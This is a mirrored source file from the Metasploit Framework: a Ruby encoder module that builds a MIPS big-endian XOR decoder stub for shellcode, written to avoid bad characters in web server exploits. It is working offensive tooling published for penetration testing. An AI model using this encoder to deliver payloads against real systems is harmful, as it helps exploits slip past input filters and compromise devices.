CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/encoders/mipsbe/byte_xori.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasm'

7


8
class MetasploitModule < Msf::Encoder::Xor

9
  Rank = NormalRanking

10


11
  def initialize

12
    super(

13
      'Name'             => 'Byte XORi Encoder',

14
      'Description'      => %q{

15
        Mips Web server exploit friendly xor encoder. This encoder has been found useful on

16
        situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS

17
        architectures, this one is based on the xori instruction.

18
      },

19
      'Author'           =>

20
        [

21
          'Julien Tinnes <julien[at]cr0.org>',  # original longxor encoder, which this one is based on

22
          'juan vazquez',                       # byte_xori encoder

23
          'Pedro Ribeiro <[email protected]>',   # fix for Linux >= 2.6.11 (set up cacheflush() args properly)

24
        ],

25
      'Arch'             => ARCH_MIPSBE,

26
      'License'          => MSF_LICENSE,

27
      'Decoder'          =>

28
        {

29
          'KeySize'   => 1,

30
          'BlockSize' => 1,

31
          'KeyPack'   => 'C',

32
        })

33
  end

34


35
  #

36
  # Returns the decoder stub that is adjusted for the size of the buffer

37
  # being encoded.

38
  #

39
  def decoder_stub(state)

40


41
    # add 4 number of passes  for the space reserved for the key, at the end of the decoder stub

42
    # (see commented source)

43
    number_of_passes=state.buf.length+4

44
    raise EncodingError.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766

45


46
    # 16-bits not (again, see also commented source)

47
    reg_14 = (number_of_passes+1)^0xFFFF

48
    reg_5 = state.buf.length^0xFFFF

49


50
    decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data

51
main:

52


53
li macro reg, imm

54
  addiu reg, $0, imm                     ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff

55
endm

56


57
  li      ($14, #{reg_14})               ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)

58
  nor     $14, $14, $0                   ; 0x01c07027 - get in $14 the number of passes

59
  li      ($11,-84)                      ; 0x240bffac - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)

60


61
; acts as getpc

62
next:

63
  bltzal  $8, next                       ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.

64
  slti    $8, $0, 0x#{slti_imm(state)}   ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm

65


66
  nor     $11, $11, $0                   ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)

67
  addu    $25, $31, $11                  ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub

68
  addu	  $16, $31, $11		             ; $16 too (used to set up the cacheflush() arg down below)

69


70
  slti    $23, $0, 0x#{slti_imm(state)}  ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm

71
  lb      $17, -1($25)                   ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)

72


73
; Init $6 and $15

74
  li      ($13, -4)                      ; 0x240dfffc - $13 = -4

75
  nor     $6, $13, $0                    ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter

76
  addi    $15, $6, -2                    ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)

77


78
; In order avoid null bytes, decode also the xor key, so memory can be

79
; referenced with offset -1

80
loop:

81
  lb      $8, -4($25)                    ; 0x8f28fffc - Load in $8 the byte to decode

82
  addu    $23, $23, $15                  ; 0x02efb821 - Increment the counter ($23)

83
  xori    $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3

84
  #{set_on_less_than(state)}             ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt

85
  sb      $3, -4($25)                    ; 0xaf23fffc - Store decoded byte on memory

86
  bne     $0, $30, loop                  ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)

87
  addu    $25, $25, $15                  ; 0x032dc821 - next instruction to decode, executed because of the pipelining

88


89
  addiu	$4, $16, -4                      ; cacheflush() addr parameter

90
  li(      $10,#{reg_5})                 ; cacheflush() nbytes parameter

91
  nor   $5, $10, $0                      ; same as above

92


93
  li      ($2, 4147)                     ; 0x24021033 - cacheflush system call

94
  syscall 0x52950                        ; 0x014a540c

95
  nop                                    ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop

96
EOS

97


98
    return decoder

99
  end

100


101


102
  def padded_key(state, size=1)

103
    key = Rex::Text.rand_text(size, state.badchars)

104
    key << [state.key].pack("C")

105
    return key.unpack("n")[0].to_s(16)

106
  end

107


108
  # Returns an two-bytes immediate value without badchars. The value must be

109
  # on the 0x8000-0x8fff so it is used as negative value by slti (set less

110
  # than signed immediate)

111
  def slti_imm(state)

112
    imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))

113
    return imm.unpack("n")[0].to_s(16)

114
  end

115


116
  # Since 0x14 contains the number of passes, and because of the li macro, can't be

117
  # longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used

118
  # here

119
  def set_on_less_than(state)

120
    instructions = {

121
      "sltu   $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned

122
      "slt    $30, $23, $14" => "\x02\xee\xf0\x2a"  # set less than

123
    }

124


125
    instructions.each do |k,v|

126
      if Rex::Text.badchar_index(v, state.badchars) == nil

127
        return k

128
      end

129
    end

130


131
    raise BadcharError.new,

132
          "The #{self.name} encoder failed to encode the decoder stub without bad characters.",

133
          caller

134
  end

135


136
  def encode_finalize_stub(state, stub)

137
    # Including the key into the stub by ourselves because it should be located

138
    # in the last 4 bytes of the decoder stub. In this way decoding will convert

139
    # these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports

140
    # one decoder_key_offset position

141
    real_key = state.key

142
    stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

143
    stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

144
    stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

145
    stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

146
    return stub

147
  end

148
end

149


150